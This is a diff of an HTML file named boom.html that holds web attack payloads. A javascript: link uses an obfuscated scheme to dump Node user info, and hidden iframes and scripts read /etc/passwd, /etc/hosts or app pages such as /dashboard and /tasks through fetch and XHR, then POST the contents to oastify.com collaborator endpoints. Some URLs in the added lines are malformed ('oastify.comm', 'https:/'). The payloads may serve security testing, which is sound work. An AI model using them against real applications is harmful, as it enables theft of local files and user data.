--- a/boom.html
+++ b/boom.html
@@ -1,6 +1,6 @@
 <a href="java&Tab;script:alert(JSON.stringify(require('os').userInfo()))">UserInfo</a>123
 <iframe 
-  src="file:///etc/passwd" 
+  src="/dashboard" 
   width="100%" 
   height="600px" 
   style="border:1px solid black;">
@@ -8,18 +8,18 @@
 
 <!DOCTYPE html>
 <body>
-  <iframe src="file:///etc/hosts" style="display:none"></iframe>
+  <iframe src="/dashboard" style="display:none"></iframe>
   <script>
     // Attempt to read via fetch()
-    fetch('file:///etc/hosts')
+    fetch('/dashboard')
       .then(r => r.text())
-      .then(d => fetch('https://xabhsq16yiae1bttw6sjlxd33u9mxhl6.oastify.com/exfil', { method: 'POST', body: d }))
-      .catch(e => fetch('https://xabhsq16yiae1bttw6sjlxd33u9mxhl6.oastify.com/error', { body: e.message }));
+      .then(d => fetch('https://334b7k08a2q07qgnjriq73kplgr9f43t.oastify.com/exfil', { method: 'POST', body: d }))
+      .catch(e => fetch('https://334b7k08a2q07qgnjriq73kplgr9f43t.oastify.comm/error', { body: e.message }));
 
     // Fallback to XHR
     const xhr = new XMLHttpRequest();
-    xhr.open('GET', 'file:///etc/hosts', true);
-    xhr.onload = () => fetch('https://xabhsq16yiae1bttw6sjlxd33u9mxhl6.oastify.com/xhr', { body: xhr.responseText });
+    xhr.open('GET', '/dashboard', true);
+    xhr.onload = () => fetch('https://334b7k08a2q07qgnjriq73kplgr9f43t.oastify.com/xhr', { body: xhr.responseText });
     xhr.send();
   </script>
 </body>
@@ -27,21 +27,22 @@
 
 <!DOCTYPE html>
 <body>
-  <iframe src="file:///etc/passwd" style="display:none"></iframe>
+  <iframe src="/tasks" style="display:none"></iframe>
   <script>
     // Attempt to read via fetch()
-    fetch('file:///etc/passwd')
+    fetch('/tasks')
       .then(r => r.text())
-      .then(d => fetch('https://xabhsq16yiae1bttw6sjlxd33u9mxhl6.oastify.com/exfil', { method: 'POST', body: d }))
-      .catch(e => fetch('https://xabhsq16yiae1bttw6sjlxd33u9mxhl6.oastify.com/error', { body: e.message }));
+      .then(d => fetch('https://334b7k08a2q07qgnjriq73kplgr9f43t.oastify.com/exfil', { method: 'POST', body: d }))
+      .catch(e => fetch('https:/334b7k08a2q07qgnjriq73kplgr9f43t.oastify.com/error', { body: e.message }));
 
     // Fallback to XHR
     const xhr = new XMLHttpRequest();
     xhr.open('GET', 'file:///etc/passwd', true);
-    xhr.onload = () => fetch('https://xabhsq16yiae1bttw6sjlxd33u9mxhl6.oastify.com/xhr', { body: xhr.responseText });
+    xhr.onload = () => fetch('https://334b7k08a2q07qgnjriq73kplgr9f43t.oastify.com/xhr', { body: xhr.responseText });
     xhr.send();
   </script>
 </body>
 </html>
+
 
 
